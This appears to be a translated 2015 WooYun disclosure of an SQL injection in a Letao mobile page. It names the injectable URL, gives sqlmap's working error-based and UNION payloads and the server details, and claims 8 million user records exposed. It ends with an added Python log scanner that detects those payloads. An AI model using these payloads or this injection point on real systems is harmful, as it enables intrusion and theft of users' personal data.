
Vulnerability Summary

Defect ID: wooyun-2015-0141381

Title: SQL injection on a Letao (乐淘网) site exposes 8 million users' information

Vendor: 乐淘网 (Letao)

Author: 路人甲

Submitted: 2015-09-15 19:31

Fix time: 2015-09-20 19:32

Published: 2015-09-20 19:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-09-15: Details sent to the vendor; awaiting vendor handling
2015-09-20: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on a Letao (乐淘网) site exposes 8 million users' information

Details:

Injection point (the * marks the injected parameter): http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand

[Screenshot: 1.jpg]


262 tables are involved

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))&op=brand
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL-- &op=brand
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: letaoerp
[262 tables]


8 million users

[Screenshot: 2.png]


Fields include email address, mobile number, real name, username, password and others

[Screenshot: 3.png]
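As an added defender-side example (not part of the original report), the Python below scans constructed IIS-style log lines for the two payload shapes in the sqlmap output above, URL-decoding them and resolving the CHAR() concatenation so that the boundary strings sqlmap wraps around extracted values (qzpqq ... qqkbq) become readable; the log lines and their field layout are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method cs-uri-stem cs-uri-query sc-status),
# not taken from the report; lines 2 and 3 use the payload shapes from the sqlmap output.
SAMPLE_LOG = """\
2015-09-15 11:02:13 GET /wap/app_download.aspx bid=12&op=brand 200
2015-09-15 11:02:14 GET /wap/app_download.aspx bid=12+AND+9010%3DCONVERT(INT,(SELECT+CHAR(113)%2BCHAR(122)%2BCHAR(112)%2BCHAR(113)%2BCHAR(113)%2B(SELECT+(CASE+WHEN+(9010%3D9010)+THEN+CHAR(49)+ELSE+CHAR(48)+END))%2BCHAR(113)%2BCHAR(113)%2BCHAR(107)%2BCHAR(98)%2BCHAR(113)))&op=brand 500
2015-09-15 11:02:15 GET /wap/app_download.aspx bid=12+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,CHAR(113)%2BCHAR(122)%2BCHAR(112)%2BCHAR(113)%2BCHAR(113)%2BCHAR(104)%2BCHAR(108)%2BCHAR(86)%2BCHAR(83)%2BCHAR(109)%2BCHAR(70)%2BCHAR(72)%2BCHAR(112)%2BCHAR(119)%2BCHAR(112)%2BCHAR(113)%2BCHAR(113)%2BCHAR(107)%2BCHAR(98)%2BCHAR(113),NULL,NULL--+&op=brand 200
"""

# A run of CHAR(n)+CHAR(n)+... builds a string literal without any quote characters.
CHAR_CONCAT = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*", re.I)

def decode_char_concat(sql: str) -> str:
    """Replace every CHAR() concatenation with the quoted literal it evaluates to."""
    def literal(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"
    return CHAR_CONCAT.sub(literal, sql)

def analyse_query(cs_uri_query: str) -> dict:
    """URL-decode a query string and flag the two MSSQL injection shapes from the report."""
    decoded = decode_char_concat(unquote_plus(cs_uri_query))
    result = {"decoded": decoded, "error_based": False, "union_columns": 0, "markers": []}
    # Error-based: a string is pushed through CONVERT(INT, ...) so that the
    # conversion failure message echoes it back (typically an HTTP 500 server-side).
    if re.search(r"\bCONVERT\s*\(\s*INT\s*,", decoded, re.I):
        result["error_based"] = True
    # UNION: the number of select-list entries is the column count that was probed.
    m = re.search(r"UNION\s+ALL\s+SELECT\s+(.*?)(?:--|$)", decoded, re.I | re.S)
    if m:
        result["union_columns"] = len(m.group(1).split(","))
    # sqlmap brackets each extracted value with fixed boundary strings (qzpqq ... qqkbq
    # above); listing the decoded literals exposes them for hunting the rest of the session.
    result["markers"] = re.findall(r"'([^']*)'", decoded)
    return result

def scan_log(log_text: str) -> list:
    """Return (timestamp, status, analysis) for each request that looks injected."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split(" ")
        if len(fields) < 6:
            continue
        date, time, _method, _stem, query, status = fields[:6]
        analysis = analyse_query(query)
        if analysis["error_based"] or analysis["union_columns"]:
            hits.append((f"{date} {time}", int(status), analysis))
    return hits
```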


Proof of vulnerability:

Remediation:

Copyright notice: credit the source when reposting: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: No impact; vendor ignored the report

Ignored at: 2015-09-20 19:32

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None